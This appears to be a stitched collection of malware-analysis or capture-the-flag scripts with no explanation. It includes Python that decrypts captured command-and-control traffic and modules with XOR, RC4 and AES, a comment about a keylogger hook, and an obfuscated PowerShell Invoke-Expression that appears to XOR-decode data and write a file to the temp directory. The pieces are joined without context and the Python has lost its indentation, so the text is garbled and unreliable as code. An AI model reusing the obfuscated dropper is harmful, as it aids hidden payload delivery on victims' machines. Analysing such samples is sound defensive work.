EAOAA0ADUANABmAGQAMwBkADYAZQAxAGQANQAwADgANQA3ADkAZgBiADgAOAAyADkAYgBlAGMAYwBiADQAMQAyADEANgBmADcAZAAzADUANgA4AGMAZgA4ADAANwA5AGYAOQBkADMANABkADYANQAwADAAMgBjADcAYwA3AGYAZQA5ADMAMQBkADUAZABhADQANAA3ADgAYwBkADQANgA4ADUAZQA1ADAAMAAwADcANwBhADcAYQA5AGMANgA5ADcAYQA5ADAANQA5ADQAOQA2AGQAZQBlADUAYgA5ADUAMwAxAGEAMwAyADkAZQBjADkAZAAwADcAZQBmADAAMgBhADYANQBmADkANAAzAGQAZAA0ADMANQAwADUAMgBjADUAMABjAGMANgAxADUAMwBhADkAYwA3ADEAMQBjADMAOQA0ADEAZQA1AGEAZQA4AA=='
	# Write-Host "Encrypted:`n$encrypted`n"

	# create new object using $encrypted and $aeskey
	$secureObject = ConvertTo-SecureString -String $encrypted -Key $aesKey

	# perform decryption from secure object
	$decrypted = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($secureObject)
	$decrypted = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($decrypted)
	$decrypted
	import os

	for i in range(1, 33):
	name = "_" + str(i)
	data = open(name, "rb").read()

	if i == 3 or i == 14 or i == 30 or i == 31:
	out = name + '.b'
	open(out, "wb").write(data)
	os.system("serpent.exe " + out + " " + out + 'i')
	os.system("alg.exe " + out + "i " + out + 'in')
	else:
	out = name + '.b'
	open(out, "wb").write(data[4:])
	os.system("alg.exe " + out + " " + out + 'in')
	from Crypto.Cipher import AES, ARC4
	import os

	for i in range(1, 33):
	name = "send_" + str(i)
	data = open(name, "rb").read()
	key = data[9:0x19]

	if ord(data[8]) == 0:
	out = "_" + str(i)
	enc = data[0x1d:]
	open(out, "wb").write(''.join(chr(ord(enc[i]) ^ ord(key[i%16])) for i in range(len(enc))))

	if ord(data[8]) == 1:
	rc4 = ARC4.new(key)
	out = "_" + str(i)
	open(out, "wb").write(rc4.decrypt(data[0x1d:]))

	if ord(data[8]) == 2:
	aes = AES.new(key, AES.MODE_ECB)
	out = "_" + str(i)
	open(out, "wb").write(aes.decrypt(data[0x1d:]))

	if ord(data[8]) == 4:
	out = "_" + str(i)
	open(out, "wb").write(data)

	# call hook keylogger --> (1->i) (4->a) (0->o)
	client_recv = open("10_100.bin", "rb").read()
	client_send = open("100_10.bin", "rb").read()

	recv = client_recv.split(b"CSCN")
	send = client_send.split(b"CSCN")

	# print (recv)
	print (len(recv))
	print (len(send))

	for i in range(len(send)):
	name = "module/recv_" + str(i)
	open(name, "wb").write(b'CSCN' + recv[i])

	name = "module/send_" + str(i)
	open(name, "wb").write(b'CSCN' + send[i])
	INvoKe-EXPrEssion ((("{54}{55}{3}{82}{7}{81}{74}{62}{65}{86}{12}{26}{67}{19}{11}{24}{52}{76}{25}{32}{35}{36}{69}{9}{22}{51}{43}{66}{45}{61}{18}{80}{50}{14}{75}{77}{29}{13}{68}{16}{2}{31}{15}{72}{85}{17}{73}{70}{59}{88}{89}{39}{53}{34}{5}{78}{41}{63}{38}{21}{33}{4}{46}{27}{48}{71}{10}{79}{37}{28}{64}{42}{20}{60}{49}{47}{6}{23}{57}{1}{84}{87}{83}{58}{40}{0}{56}{30}{8}{44}"-f '.IO.File]::Write','id();
	','r (','t_','t_.Length];
	}

	tyPt','] -bx','[System.G','= tyPenv:C','s(tyPtmp,[B','3','Pat','49, 6','
	ty','2','9, 28, 1','k.Lengt','
	fo',' t',', 72, ',', ','strin','% tyPh','9,','uid]::Ne','6,',' 95','Pk =','= [','th();',' ','Byte','tyPi=0; tyPi -lt tyP',', 95,','os','k[tyPi',' 3','0, 43, 48, ','::GetTempPa','i ','t','
	[System',' tyPh','
	[','4','yte[]]tyPk);
	',', ','mp ','Pname = ','Syste','y','2',' ',' 40, 44, 74','yP','t','yPhos','All','wGu','name;
	','t','g] t','74','NA','ost_[tyP','
	','M','9, 76',' 27, 39','8;

	','114, ','Pk[','m.IO.','h','y','MPUTER','14,',',',' 27,','or','h]','30, ','O',' ','mp += tyP','
	t','; tyPi++) {
	','E;
	','yPt','yPi]',' = ')).ReplACE('tyP',[sTRiNg][CHAR]36))